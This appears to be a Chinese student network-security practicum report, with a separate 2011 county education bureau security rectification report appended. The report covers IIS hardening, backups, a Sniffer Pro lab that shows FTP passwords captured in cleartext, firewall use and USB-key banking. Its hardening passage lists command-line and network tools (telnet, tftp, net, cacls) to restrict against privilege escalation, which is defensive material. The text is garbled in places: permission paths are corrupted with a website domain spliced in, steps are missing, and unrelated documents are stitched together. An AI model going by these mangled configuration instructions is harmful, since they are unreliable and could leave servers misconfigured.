通過配置某個特定站點上的網絡帶寬,您可以更好地控制該站點的通信量。例如,通過在低優先級的 Web 站點上限制帶寬,您可以放寬對他站點的訪問量的限制。同樣,當您指定到某個 Web 站點的連接數量時,您就可以為其他站點釋放資源。設置是站點專用的,應根據網絡通信量和使用變化情況進行調整。
---單擊“限制可用于此 Web 站點的帶寬”復選框,將其選中,可配置 IIS 將網絡帶寬調節到選定的最大帶寬量,以千字節每秒(KB/S)為單位。
---單擊Web 服務連接 復選框,將其選中,可選擇特定數目或者不限定數目的 Web 服務連接。限制連接可使計算機資源能夠用于其他進程。
備注:每個瀏覽 Web 站點的客戶機通常都使用大約三個連接。⑹單擊主目錄 選項卡。
---如果您想使用存儲在本地計算機上的Web內容,則單擊“此計算機上的目錄”然后在本地路徑框中鍵入您想要的路徑。例如,默認路徑為
C:Inetpubwww.tmdps.cnmon files:
everyone:讀取及運行,列出文件目錄,讀取(允許將來自父系的可
繼承性權限傳播給對象)⑶inetpubwww.tmdps.cnpressed files、offline web pages、system32、tasks、temp、web以外的所有目錄去除“允許將來自父系的可繼承性權限傳播給對象”選框,復制。
⑹ windows:everyone:讀取及運行,列出文件目錄,讀取(允許將來自父系的可繼承性權限傳播給對象)
⑺windowstemp:(允許訪問數據庫并顯示在asp頁面上)everyone:修改(允許將來自父系的可繼承性權限傳播給對象)再單獨對cmd.exe、net.exe、net1.exe、ping.exe、netstat.exe、ftp.exe、tftp.exe、telnet.exe、regedit.exe、at.exe、attrib.exe、format.exe設置為只允許administrators組訪問,這樣就可以防范通過Serv-U的本地提升權限漏洞來運行這些關鍵的程序了,再刪除cacls.exe這個程序,防止有人通過命令行來修改權限還比較有威脅的組件就是Shell.Application和Wscript.Shell這兩個組件了,Shell.Application可以對文件進行一些操作,還可以執行程序,但不能帶參數,而Wscript.Shell可以操作注冊表和執行DOS命令。
3.數據備份和恢復
3.1FileGee軟件
3.1.1FileGee軟件介紹
FileGee個人文件同步備份系統是一款優秀的文件同步與備份軟件。它集文件備份、同步、加密、分割于一身。協助個人用戶實現硬盤之間,硬盤與移動存儲設備之間的備份與同步。強大的容錯功能和詳盡的日志、進度顯示,更保證了備份、同步的可靠性。高效穩定、占用資源少的特點,充分滿足了用戶的需求。不需要額外的硬件資源,便能搭建起一個功能強大、高效穩定的全自動備份環境,是一種性價比極高的選擇。
3.1.2 FileGee軟件使用
⑴找到“FileGee個人文件同步備份系統”軟件安裝的圖標,雙擊運行,圖-軟件運行主界面
⑵選擇任務名稱遺跡執行方式
圖-任務名稱與執行方式選項
⑶選擇備份原文件位置
圖-備份的原文件位置設置
⑷進行備份目標設置
圖-備份的目標位置設置
⑸進行備份文件過濾設置
圖-需要備份的文件的過濾設置
⑹設置自動備份時間
圖-設置自動備份的時間模式
⑺任務的高級設置
圖-該任務的高級設置
⑻設置發送結果信息
圖-在任務結束后設置發送的結果信息
⑼完成備份
圖-該任務完成設置后的主界面
4.網絡安全防護
4.1 SnifferPro數據包捕獲與協議分析
4.1.1實驗原理
數據在網絡上是以很小的被稱為“幀”或“包”的協議數據單元(PDU)方式傳輸的。以數據鏈路層的“幀”為例,“幀”由多個部分組成,不同的部分對應不同的信息以實現相應的功能,例如,以太網幀的前12個字節存放的是源MAC地址和目的MAC地址,這些數據告訴網絡該幀的來源和去處,其余部分存放實際用戶數據、高層協議的報頭如TCP/IP的報頭或IPX報頭等等。幀的類型與格式根據通信雙方的數據鏈路層所使用的協議來確定,由網絡驅動程序按照一定規則生成,然后通過網絡接口卡發送到網絡中,通過網絡傳送到它們的目的主機。目的主機按照同樣的通信協議執行相應的接收過程。接收端機器的網絡接口卡一旦捕獲到這些幀,會告訴操作系統有新的幀到達,然后對其進行校驗及存儲等處理。4.1.2基本的網絡數據幀的捕獲和解碼
⑴Sniffer Pro 4.7的安裝與啟動
①啟動Sniffer Pro 4.7。在獲取Sniffer Pro 4.7軟件的安裝包后,運行安裝程序,按要求輸入相關信息并輸入注冊碼,若有漢化包請在重啟計算機前進行漢化。完成后重啟計算機,點擊“開始”?“程序”?“Sniffer Pro”“Sniffer”,啟動“Sniffer Pro 4.7”程序。
②選擇用于Sniffer的網絡接口。如果計算機有多個網絡接口設備,則可通過菜單“File”“Select Settings”,選擇其中的一個來進行監測。
⑵監測網絡中計算機的連接狀況
配置好服務器和工作站的TCP/IP設置并啟動Sniffer Pro軟件,選擇
“菜單”中“Monitor(監視器)”“Matrix(主機列表)”,從工作站訪問服務器上的資源,如WWW、FTP等,觀察檢測到的網絡中的連接狀況,記錄下各連接的IP地址和MAC地址。
⑶監測網絡中數據的協議分布 選擇菜單“Monitor”→“Protocal distribution(協議分布)”,監測數據包中的使用的協議情況。
⑷監測分析網絡中傳輸的ICMP數據
①定義過濾規則:點擊菜單“Capture”“Define Filter(定義過濾器)”,在在對話框中進行操作。點擊“Address”(地址)選項卡,設置:“地址類型”為IP,“包含”本機地址,即在“位置1”輸入本機IP地址,“方向”(Dir.)為“雙向”,“位置2”為“任意的”。點擊“Advanced(高級)”選項卡,在該項下選擇“IP”→“ICMP”。設置完成后點擊菜單中“Capture(捕獲)”→“Start”開 始記錄監測數據。
②從工作站Ping服務器的IP地址。
③觀察監測到的結果:點擊菜單中“Capture”→“Stop and display”,將進入記錄結果的窗口。點擊下方各選項卡可觀察各項記錄,可通過“File”→Save”保存監測記錄。
④記錄監測到的ICMP傳輸記錄:點擊記錄窗口下方的解碼“Decode(解碼)”選項,進入解碼窗口,分析記錄,找到工作站向服務器發出的請求命令并記錄有關信息。
⑸監測分析網絡中傳輸的HTTP數據
①在服務器的Web目錄下放置一個網頁文件。
②定義過濾規則:點擊菜單“Capture”“Define Filter”,在對話框中點“Advanced”選項卡,在該項下選擇“IP”→“TCP”→“HTTP”。設置完成后點擊菜單中“Capture”→“Start'’開始記錄監測數據。
③從工作站用瀏覽器訪問服務器上的網頁文件。
④觀察監測到的結果:點擊菜單中“Capture”→“Stop and display”,將進入記錄結果的窗口,點擊下方各選項卡可觀察各項記錄。點擊“File”→Save”保存記錄。
⑤記錄監測到的HTTP傳輸記錄:點擊記錄窗口下方的解碼“Decode”選項,進入解碼窗口,分析記錄,找到工作站向服務器發出的網頁請求命令并記錄有關信息。
⑹監測分析網絡中傳輸的FTP數據
①啟用服務器的Serv-U軟件,在FTP服務目錄下放置一個文本文件。最好在FTP中建立兩個用戶,即匿名用戶(anonymous)和一個授權用戶(用
戶名、權限自定)。
②定義過濾規則:點擊菜單“Capture”→“Define Filter”,在“Summary”選項卡下點擊“Reset"按鈕將過濾規則恢復到初始狀態,然后在“Advanced”選項卡下選擇“IP”→“TCP”→“FTP”。設置完成后點擊菜單“Capture”→“Start”開始記錄監測數據。
③從工作站用FTP下載服務器上的文本文件。
④觀察監測到的結果:點擊菜單“Capture”→“Stop and display”,進入記錄結果的窗口,點擊下方各選項卡觀察各項記錄并保存記錄。監控顯示如圖1-6所示。可以看到登錄密碼也是明文顯示的。
⑤記錄監測到的FTP傳輸記錄:點擊記錄窗口下方的解碼“Decode”選項,進入解碼窗口,分析記錄,找到工作站向服務器發出的FTP命令并記錄。
4.2 天網防火墻的使用
⑴在這我們可以看到在防火墻監控中的應用程序,點擊該程序的“選項”按鈕,我們可以設置更為詳細的規則,如圖
⑵點擊
⑶
⑸這樣就能看到網絡訪問情況了,框:
為結束進程鍵,當用戶發現有不法進程而要終止它們運行的時候,可以利用這個鍵。按下后出現以下提示
⑹
⑺為“連接網絡”狀態,為“斷開網絡”狀態,如果按下斷開/接通網絡按鈕,那么您的計算機就將完全與網絡斷開,就好像拔下了網線一樣。沒有任何人可以訪問您的計算機,但您也不可以訪問網絡。這是在遇到頻繁攻擊的時候最有效的應對方法。
5.應用安全
5.1支付寶數字證書
⑴直接登錄支付寶,在安全中心頁面,點擊安裝數字證書;
⑵點擊【安裝數字證書】,選擇【通過手機短信】后點擊【下一步】(收銀臺頁面安裝時默認通過手機短信),進入安裝證書頁面;
⑶選擇證書使用地點,輸入【驗證碼】;
⑷輸入手機上收到的校驗碼,點擊【確定】;
4)安裝成功。
5.2 USB KEY的使用
⑴將USBKey插入計算機的USB接口,電腦系統會自動安裝USBKey管理工具,安裝成功后電腦屏幕右下角顯示USBKey管理工具圖標。
⑵USBKey管理工具安裝成功后,頁面會彈出密碼輸入框,首次使用USBKey時,會強制您修改USBKey密碼,初始密碼為8個8,修改后的密碼不能過于簡單,如8個相同的字母數字,或者12345678此類的均不符合安全性規定,會強制重新設置。
⑶密碼修改成功后,就可以點擊主頁右上角“企業網上銀行登錄”,在登錄頁面選擇“CA登錄”進行登錄操作啦。彈出的
總結
網絡信息安全是一個關系國家安全和主權、社會穩定、民族文化繼承和發揚的重要問題。其重要性,正隨著全球信息化步伐的加快越來越重要。經過為期一周的實訓使我對網絡與信息安全有了進一步的認識。以及對相關軟件的操作更加嫻熟,網絡這個時代的主流已經發展的越來越快了,應用也越來越廣泛,組建的再好網站都需要有很高的安全。我們應該持有相關謹慎的態度去面對有關網絡信息的挑戰。
參考文獻 周學廣等信息安全學.北京:機械工業出版社,2003.3 2(美)Mandy Andress著楊濤等譯計算機安全原理.北京:機械工業版社,2002.1 曹天杰等編著.計算機系統安全.北京:高等教育出版社,2003.9 4 劉衍衍等編著.計算機安全技術.吉林:吉林科技技術出版社.1997.8
第五篇:網絡信息安全保密工作整改報告
xx縣教體局網絡信息安全保密工作
整 改 報 告
自XX 縣信息化領導小組對我局進行安全檢查以來,我局對 網絡信息安全保密工作高度重視,主管局長XX 同志于9 月13 日 組織了“加強網絡信息安全保密工作”專題會,會上我們認真分 析了檢查小組的指導意見以及在自查中發現的一些管理上的細 節問題;在此基礎上制定了網絡信息安全保密工作整改方案:
一、以“方城縣教育系統網絡文明公約”普及為契機,在全縣教 育系統進行網絡信息安全保密工作的強化宣傳教育。
通過強化宣傳教育,使教育系統內人人都能認識到網絡信息 安全保密工作的重要性,以自覺帶自律,從自身的細節處做起,每個人都是一個安全點,點點相邊形成安全面。從而強化網絡信 息安全保密工作。
二、對入網單位的自查要制度化。
在自查過程中,對部分單位線路架設不規范;五防措施不到 位要求其限期整改的,在整改后進行復查。
成立網絡信息安全工作檢查小組,在復查的基礎上,對所有 入網單位進行不定期、不定時、不定點的突擊抽查。以敦促各網 絡接入單位對網絡信息安全保密工作管理常規化、制度化。
三、對文印室等重要信息點完善管理
針對文印室數據交換時暴露出的移動介質管理不到位的問 題,我們認真分析現況。制訂管理方案,并由局辦公室專門下發 通知,“通知”要求各科室指定辦公用的移動存儲設備,并登記 造冊,各科室在進行數據交換時不使用指定設備以外的設備,在 進行數據交換前進行相關的安全掃描。
架設物理隔離區的安全掃描機,安裝相關安全軟件并定期更 新,對進入文印室的移動存儲設備進行病毒、木馬等相關安全掃 描,確認安全后再進入文印室等重要信息管理區;從而確保重要 信息區的信息安全。
XX 縣教體局
2011 年9 月19 日
點擊咨詢 